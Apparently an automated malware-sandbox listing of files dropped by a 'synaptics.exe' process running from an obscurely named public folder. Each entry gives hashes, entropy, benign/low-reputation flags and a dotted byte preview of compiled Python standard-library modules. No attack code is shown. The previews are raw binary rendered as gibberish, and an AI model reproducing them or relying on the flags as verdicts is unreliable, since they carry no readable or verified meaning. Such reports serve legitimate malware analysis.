                                                                                                                                                                                      SSDEEP:768:Ptwxm9l/P/XkfPdJRP8IqEhlM+5lEwQ04PmNn9N:POxWpQ+I3hlNlEwQ0uc9N
                                                                                                                                                                                      MD5:86A1D7224A6C9F29C3AB6425C6DA4EC4
                                                                                                                                                                                      SHA1:7B7BF0578B4FF2D0806B5BAF6D71806733574D78
                                                                                                                                                                                      SHA-256:45E2F11BC9D5F24C7EFD4B95275F7D0049F67E8AF716EFF83ECDC2593164D56A
                                                                                                                                                                                      SHA-512:D82CA4A1CF840085C389ACB9D772B6DB324812302696AF7111A88F79CB0D199897BE0448268004748C355925A8F7A1A3249D1B74097FAA9AE2239C797D158147
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dq........................@...sT...d.Z.d.d.l.Z.d.d.l.T.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...z.d.d.l.Z.W.n...e.y3......d.Z.Y.n.w.e.e.d.d...Z.e.e.d.d...Z.e.e.d.d...Z.g.d...Z.e...e...e.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......d.Z.d.Z.d.d...Z.e.j.......d.....r.i.Z.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d <.d!e.d"<.d#e.d$<.d%e.d&<.d'e.d(<.d)e.d*<.d+e.d,<.d-e.d.<.d/e.d0<.d1e.d2<.d3e.d4<.d5e.d6<.d7e.d8<.d9e.d:<.d;e.d<<.d=e.d><.d?e.d@<.dAe.dB<.dCe.dD<.dEe.dF<.dGe.dH<.dIe.dJ<.dKe.dL<.dMe.dN<.dOe.dP<.dQe.dR<.dSe.dT<.dUe.dV<.dWe.dX<.dYe.dZ<.d[e.d\<.d]e.d^<.d_e.d`<.dae.db<.dce.dd<.dee.df<.dge.dh<.die.dj<.dke.dl<.dme.dn<.doe.dp<.dqe.dr<.dse.dt<.due.dv<.dwe.dx<.dye.dz<.d{e.d|<.d}e.d~<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15207
                                                                                                                                                                                      Entropy (8bit):5.610123589853115
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:MAz34fmVm0PVclj2zdkfUQPM2uwNX+0b5+Qwo39l5JCusKeMjv:MAnV8j8K8QL995twoNnJuKeov
                                                                                                                                                                                      MD5:40D5F2F13E426D6DA926F5D9D7F1EF8B
                                                                                                                                                                                      SHA1:1DF31256F6E5EB08EAEF48531A23B268A165808F
                                                                                                                                                                                      SHA-256:A227116BAC972F5A76642BEBEB1B79DD95B0A2F44991486DC275485F33DB5D48
                                                                                                                                                                                      SHA-512:09AC1A9B952EB1B093AE2F0D2E091E66C1EBAF248F55FD7C5A4B8F1BC3A9FD52291CA368D03E3BEF6884184C3114A623868EA59ED7430B452E5676156DD46176
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dmp.......................@...s$...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.e.j.e.k.s.J.d.....e.e.h.Z.e.e.e.h.Z.e.e.h.Z.e.e.h.Z.e.e.e.h.B.Z.d.Z.d.d...e.D...Z.e.j.f.d.d...Z.d.d...Z.d.d...Z.d-d.d...Z.e.j.d...Z.d.e.>.d...Z.d.Z.e.e f.d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%d.d...Z&d.d ..Z'd!d"..Z(d#d$..Z)d%d&..Z*d'd(..Z+d)d*..Z,d.d+d,..Z-d.S.)/z.Internal support module for sre.....N)...*z.SRE module mismatch).)..i...i1...)..s...i....).....i....).iE...i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i2...i....).i4...i....).i>...i....).iA...i....).iB...i....i....).iJ...i....).ic...i....).i....iK...).ia...i....).i....i....c........................s....i.|.].}.|.D.].....t...f.d.d...|.D.......q.q.S.).c....................3...s......|.].}...|.k.r.|.V...q.d.S...N..)....0..j....ir...../C:\Users\Public\QExvbmVOb25l\lib\sre_compile.py..<genexpr>N...s........z.<dictcomp>.<genexpr>)...tuple).r......tr....r....r......<dic
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6370
                                                                                                                                                                                      Entropy (8bit):5.779185419953205
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:u7jrG4iQ2AaI2Ym9hqQBI1I1dadE1ff7l17mwvYhaSEZ84C:uM9EIdNfT6E8
                                                                                                                                                                                      MD5:78312A280255BA09D4428C791B398342
                                                                                                                                                                                      SHA1:D3DD822786D223D40EA8F31D08D8499049D2EA3E
                                                                                                                                                                                      SHA-256:1156A1255C0142ECC51BDC390F54B68AA5C2CB123B66456403A36B9B85214463
                                                                                                                                                                                      SHA-512:D1535C8B782729F05E95748A2703BFC3FA4C2216A6FD7D1224F5E4D00B02153AACC9895DB0EE2F51FC70DA2623335EF46DB4D718AA45F15FCB293ABC4D66DA75
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s^...d.Z.d.Z.d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...Z.d.d...Z.e.d...Z.e.d.d...=.e.d...Z.e.d...Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e i.Z!e.e"e.e#i.Z$e%e%e&e&e'e'e(e(e)e*e+e,e-e-e.e.i.Z/e%e0e&e1e'e2e(e3e)e4e+e5e-e6e.e7i.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDeEd.k...r-d.d...ZFeGd.d....zZHeH.Id.....eH.Id.e.......eFeHe.d ....eFeHe.d!....eFeHe.d!....eH.Id"e9......eH.Id#e:......eH.Id$e;......eH.Id%e<......eH.Id&e=......eH.Id'e>......eH.Id(e?......eH.Id)e@......eH.Id*eA......eH.Id+eB......eH.Id,eC......eH.Id-eD......W.d.........n.1...s"w.......Y...eJd.....d.S.d.S.)/z.Internal support module for srei..3......)...MAXREPEAT..MAXGROUPSc........................s&...e.Z.d.Z.d.Z.d.Z.d...f.d.d...Z.....Z.S.)...errorai...Exception raised for invalid regular expressions... Attributes:.. msg: The unformatted error message. pattern: The regular expression pattern. pos: The index in the pattern
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21768
                                                                                                                                                                                      Entropy (8bit):5.596073941861055
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:CiS5DWum7nnQBcNr5ZjTL2xsP6HeYHfS/l2b7tAu9o23kZAt2umjtU30TezUpPB9:Cig5K2I6+YKd2b7tX3AAt2usyUx0lI
                                                                                                                                                                                      MD5:6B604600B56CF13B86DA5505341277B1
                                                                                                                                                                                      SHA1:C62376E01A9FAED9FD1B7E3F6EC2E323D80E28E3
                                                                                                                                                                                      SHA-256:37A78AF691D8E85E6F2527ECA515E1D3EFCA58CE53A1A117D576A52206E7F364
                                                                                                                                                                                      SHA-512:D57FAA4A41D4B8D2AB16369B0984D0964C860E1C603DC6748903B394D7921C9AA9606183FF311932174926474952F7F4CA09157A1B299475E0BA645098C258D7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.T.d.Z.d.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.e.e.h...Z.e.e.e.e.e.e.e.h...Z.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.d...Z.e.e.f.e.e.f.e.e.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e f.d...Z!e"e#e$e%e&e'e(e)d...Z*e'e#B.e)B.Z+e,e(B.Z-G.d.d...d.e...Z/G.d.d...d...Z0G.d.d...d...Z1G.d.d...d...Z2d.d...Z3d.d ..Z4d!d"..Z5d#d$..Z6d3d&d'..Z7d(d)..Z8d*d+..Z9d4d-d...Z:d/d0..Z;d1d2..Z<d,S.)5z.Internal support module for sre.....)...*z..\[{()*+?^$|z.*+?{Z.0123456789Z.01234567Z.0123456789abcdefABCDEFZ4abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZz. ............................\).z.\a..\bz.\fz.\nz.\rz.\tz.\vz.\\).z.\Ar....z.\Bz.\dz.\Dz.\sz.\Sz.\wz.\Wz.\Z)...i..L..m..s..x..a..t..uc....................@...s....e.Z.d.Z.d.S.)...VerboseN)...__name__..__module__..__qualname__..r....r.....-C:\Users\Public\QExvbmVOb25l\lib\sre_parse.pyr....G...s........r....c...........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44833
                                                                                                                                                                                      Entropy (8bit):5.571074045540938
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:M653tgqDiJVJd4LRmQPAMN4FM81OVgTkC5Nq9F6:M63tBOJDy9T9NCUM1rqb6
                                                                                                                                                                                      MD5:D05F52515B2F1391DCB71F4C22AD68D4
                                                                                                                                                                                      SHA1:AA8C2522946E26890CE4B1CFEA48D13F842ED7F4
                                                                                                                                                                                      SHA-256:A05BAE9A574CC922E8B25154D4BD1EADCFFA8E40DFADC5A59499410ADFD1306A
                                                                                                                                                                                      SHA-512:F60036C984CF723ED73CD0A4DA5F805FA1205DA5D93A931ED35A35154F71A0F4087F0A09F48048C79BF7F8BA3748EAEBAAADEA44DD255A7799F6896DB3469E6E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!..z.d.d.l.m"Z"..W.n...e#yi......Y.n.w.d.d.l.m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m.Z.m/Z/..e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e2j3..Z4e2_4d.d...e2j5.6..D...Z7e8e2d.d...Z9G.d.d...d.e...Z:G.d d!..d!e...Z;G.d"d#..d#e...Z<G.d$d%..d%e...Z=e.j>d&k...r.d.d'l.m?Z?m@Z@..d.d(lAmAZAmBZBmCZC..d.d)lAmDZDmEZEmFZF..d.d.lAZGd.d.lHZHd.d.lIZId.d.lJZJeKZLd*g.ZMeNe.d+..ZOe.ZPe.ZQd,d-..ZRd.d/..ZSd0d1..ZTd2d3..ZUe.d4d5..ZVd6d7..ZWG.d8d9..d9e.d9d:....ZXG.d;d<..d<eXe...ZYG.d=d>..d>e...ZZeYj[f.d.d.d.d?..d@dA..Z\d[e]dBeYj[d.d.d.d.d.dC..dDdE..Z^e\Z_e^Z`G.dFdG..dG..ZadHdI..ZbG.dJdK..dKeA..ZceceZ_deaeZ_ed.d.dBe]e3d.dLdLd.f.dMdN..ZfdOdP..ZgdQZhdRZidSdT..ZjdUdV..Zkeld.eFf.dWdX..ZmdYdZ..Znd.S.)\
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4286
                                                                                                                                                                                      Entropy (8bit):5.544036225923017
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Vn/f+60wN3EXHH/aowjk0wBoCAEFXOrW6QBeABPl:VeRy3EPBwjk0w+CFXefQBT
                                                                                                                                                                                      MD5:AD84ADD95AEDFB9736A49973BBED0D16
                                                                                                                                                                                      SHA1:9CC56FDF932968B3A54147DF256E98D9CB167E74
                                                                                                                                                                                      SHA-256:9AC87000ADB670791EA7F9E96D88CA836B835F3380567853BC9621972D8DB28A
                                                                                                                                                                                      SHA-512:DB9448B413D27D79E96FB666A22594BF2DD353356B3AFB38B2244E3B529A5B1A29FE88F2B2D208CDBEDCA3F95D76F887B7EF3A52D07CDAF6A6ED4FF340520D8E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....(C:\Users\Public\QExvbmVOb25l\lib\stat.py..S_IMODE........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7115
                                                                                                                                                                                      Entropy (8bit):5.38710397186473
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:HLetNTT8nDlw15VntHYdo5H2vHA4yN/uZ1qkwto:SbTT8nhM5Vth5H2vHA4yN/G1qkwto
                                                                                                                                                                                      MD5:23FB31B14D8338DE0BE78C4DDD268182
                                                                                                                                                                                      SHA1:E33D26865D2BB3549A1BD7C93CEAEB7AEE76CBFD
                                                                                                                                                                                      SHA-256:E5281A6969CF892DEF4FCB069D514896C2E4544BCE61EDFE198C82E7B362969B
                                                                                                                                                                                      SHA-512:006587C32E18663AC50C2C543DC4F61CC5E0619E1FB3F452669ECE7316FE3CB387ABE375C6A344ABC8C537F13FBC7CB3D82487D217FB49F98D93F1F6924D6027
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d^*.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e...Z.d.Z.e.d...d...Z.d.Z.d.Z.e.e...e...e...Z.d.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z.G.d.d...d...Z.e.......G.d.d...d...Z.d.S.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..Formatter..Template.....Nz. .....Z.abcdefg
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17088
                                                                                                                                                                                      Entropy (8bit):5.694559665474942
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:rORubSi/2orlLbqOf9dzA3gfqtv+ScNDMI7BHMi+yDnuxb3rOyb5:rOkbSi+orM29JlqtvtcNoI7BHzxzra
                                                                                                                                                                                      MD5:6C38948CC946B04B221DFD220C5F49F9
                                                                                                                                                                                      SHA1:54ABE2300EA30F0270AF3A12F9ECDEA26ED24E6A
                                                                                                                                                                                      SHA-256:67C2711135D4F83490336621306D7295458176EB7E3E68AAC15609A4F3E1D947
                                                                                                                                                                                      SHA-512:4048FE9EEDB2A9949F001DF55F0D036F4267468BEDCA06DBEF4821342EA1177F5549C23F9369304373F460EF75D3C6E787F64F9FA839FA57034A00DF2D1BE6EE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.3.......................@...s....d.Z.d.d.l.m.Z...e.j.d.k.s.J...d.d...Z.e.g.d...e.e.d.d.........Z.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..i.d-d...d/d0..d1d2..d3d ..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\dM..d]dO..d^dQ..d_dS..d`dU..dadW..dbdY..dcd[..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtde..dudg..dvdi..dwdk..dxdm..dydo..dzdq..d{ds..d|d}..d~d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):320
                                                                                                                                                                                      Entropy (8bit):5.123421822560025
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/XextfvXhzYXcCuYKvg6FraMaVkoopngmIQNaHxEMW/Zkn:Cuxt35YXcaKvjFrDaVkoeWlW/Zkn
                                                                                                                                                                                      MD5:65D5D9ECF82DDF192FCF1B3E5D99D18F
                                                                                                                                                                                      SHA1:582680ADC5A0F50901BF5B75D6720CA1042BC833
                                                                                                                                                                                      SHA-256:89D26DF9CBE43882A03A4C03AD729CE753884C2AEBD456C6EC4C37317B6F9F2F
                                                                                                                                                                                      SHA-512:6DCEAB10D57749E72E14F41E5EE7EC4FFA968FB2967B06F9B6FD73BDD9CC3F19F87365B97A914CB57B6315DA680A8911C4ABD962BD687959D534F68EE691CD12
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s,...g.d...Z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.).).Z.calcsize..packZ.pack_into..unpackZ.unpack_fromZ.iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__Z._structr....r......r....r.....*C:\Users\Public\QExvbmVOb25l\lib\struct.py..<module>....s............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44754
                                                                                                                                                                                      Entropy (8bit):5.609300644883295
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:Eu0RXvdDf8N6wQVIGcx35LU1w2mDQkW4Oc+clEJn7Zk199DNSauyP4W3ggSegvc7:T0RXvZsjUeV0kzD+clEoSauLWeOQZcp
                                                                                                                                                                                      MD5:B2F6298AC7B994FFA2BFAAC1061702B6
                                                                                                                                                                                      SHA1:55D3856B0FCE0A586A385BA04793D53B06C30420
                                                                                                                                                                                      SHA-256:BB63432DB5E07309130A93AB2C34C47A8963A5E50ADED1C31FB7EC279E36065B
                                                                                                                                                                                      SHA-512:675BDB61A52244D94AC0BEA4F9BDE20564D8A19FF7476446E2C147F1B2D03601DBEA9D5B6171311761472AFEFF595F950F4DFB211049684017C544899B37AEEF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.S.......................@...sp...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.z.d.d.l.Z.W.n...e.yE......d.Z.Y.n.w.g.d...Z.z.d.d.l.Z.d.d.l.Z.d.Z.W.n...e.ym......d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.Y.n0w.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)..e..*g.d.......G.d.d...d.e+..Z,G.d.d...d.e,..Z-G.d.d...d.e,..Z.e.r.G.d.d...d...Z/G.d.d...d.e0..Z1n.e2e.d.d...Z3e4e.d...r.e.j5Z6n.e.j7Z6e.r.d.Z8d.d...Z9n.g.Z8d.d...Z9d.Z:d.Z;d.Z<d.d...Z=d.d...Z>d.d ..d!d"..Z?d#d$..Z@d.d ..d%d&..ZAG.d'd(..d(eB..ZCd.d.d.d.d)..d*d+..ZDd,d-..ZEd.d/..ZFd0d1..ZGd2d3..ZHeH..ZId.ZJG.d4d5..d5..ZKd.S.)6a....Subprocesses with accessible I/O streams..This module allows you to spawn processes, connect to their.input/output/error pipes, and obtain their return codes...For a complete description of this module see the Python documentation...Main API.========.run(...): Runs a command, waits for it to complete, then returns a.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24077
                                                                                                                                                                                      Entropy (8bit):5.282038613874124
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:8GeO1Q/N1bmiY+HWkXkYibq1vElkl0kwgbdxXrzpRwJcNrxSejqX1uk:LeQ81bminYBmvEKKkwovXbKMdTqX1uk
                                                                                                                                                                                      MD5:20C663DDEAC18497FA7BC16337637762
                                                                                                                                                                                      SHA1:6E40D841307BBD698DFF1D6875650BB9FAA3CED1
                                                                                                                                                                                      SHA-256:F177B7AB12E6FA6DADDA96A52678549A745A1D8E44E4B5DCC748D303651B0A13
                                                                                                                                                                                      SHA-512:FA72BFC5E9C84C67D863F5DEBF108732DA36C6250C1824C4EAD0FE74B4864776830D8E432089E9EE06AA2D53544E202A7CBD75CE3D63D498509EB9F3955A187F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dku.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e.j.e.j.B.e.j.B.Z.e.e.d...rJe.e.j.O.Z.e.Z e.e.d...rVe e.j!O.Z e.e.d...r_e.j"Z"n.d.Z"d.Z#e...Z$d.d...Z%d.d...Z&d.d...Z'G.d.d...d...Z(d.d...Z)d.d...Z*d.a+d.d...Z,d.d...Z-d.d...Z.d.d...Z/d.a0d.d...Z1d d!..Z2d"d#..Z3d?d%d&..Z4d@d'd(..Z5d)e#d.f.d*d+..Z6G.d,d-..d-..Z7G.d.d/..d/..Z8.....2dAd.d3..d4d5..Z9e.j:d6k.s.e.j;d7k.r.e9Z<n.e.e.d8..a=......dBd.d3..d9d:..Z<G.d;d<..d<..Z>G.d=d>..d>..Z?d.S.)Ca....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race conditions.except for 'mktemp'. 'mktemp' is subject to race conditions and.should not be used; it is provided for backward compatibility only...The default path names are returned as str. If you supply bytes as.input, all return values will b
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13825
                                                                                                                                                                                      Entropy (8bit):5.341703197070515
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:CB47dUTOzzlFEYKRuPSzqjNGmwImkWf8FBQ:CB47dzF/5JNG5MkkBQ
                                                                                                                                                                                      MD5:B3A940F042678DCFD286D8785D25DF91
                                                                                                                                                                                      SHA1:172795913DA8B32120E6B0BE01E4CE152FABA2A7
                                                                                                                                                                                      SHA-256:6BD15818608B79839DCC149D94E19A71F0DF574217A9C1DD0ACE22B2631E0CD7
                                                                                                                                                                                      SHA-512:978CA4A715A586BC617FF02A8FE395719051CD4808623C1AD906BC9B0792725A0A7643114D5EE8F5E9AED9B92D4843BC584EE5CB6BD1126B8E9ED38027AFE5D5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d*O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.e...d.e.j...Z.e...d.e.j...Z.d.d...Z.d.d.d...Z.e.d.k.rDe.e.d.......d.S.d.S.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c....................@...s....e.Z.d.Z.d.Z.i.Z.e.d...Z.e.D.].Z.e.e.e.e...<.q.d.Z.d.Z.d.e...e.....Z.d.e.d.d.......Z.e...d.e.e.e.e.d.....e.j...Z.[.[.[.e...d.e.....Z.[.e...d...Z.....................d&d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d.S.)'r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the default behaviour.. If you want to completely replace the main wrapping algorithm,. you'll probably have to override _wrap_chunks()... Several instance attributes control various aspects of wrapping:. width (default:
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44982
                                                                                                                                                                                      Entropy (8bit):5.172783428116464
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:d1A/MIxOwAgbSGxwbNNo+rkPsXj16a1Zmi8Y2S41QrTrWOnO8F8+6LcAQJWBpSUW:d2/8Zf2lbPs/v612aOBy4kSUpx05izap
                                                                                                                                                                                      MD5:C1A602F9E9EA7E248BA3C6C665CC7127
                                                                                                                                                                                      SHA1:7219313B9414A6D3CA2D02275DE4E7ED93F213D1
                                                                                                                                                                                      SHA-256:D31D9AD5939F5BE84955708DA680FEB7B2BFF6515C9E0D05D41542D48EC8347C
                                                                                                                                                                                      SHA-512:DD24098ABBC6659D4F370FBC0BE4C8F8D40C793C8079D401EFA1320A2AE9A10F2F0BEC8AA507FB1CC2B920BA622D579B906250779DA8891427797E7FDF52C359
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
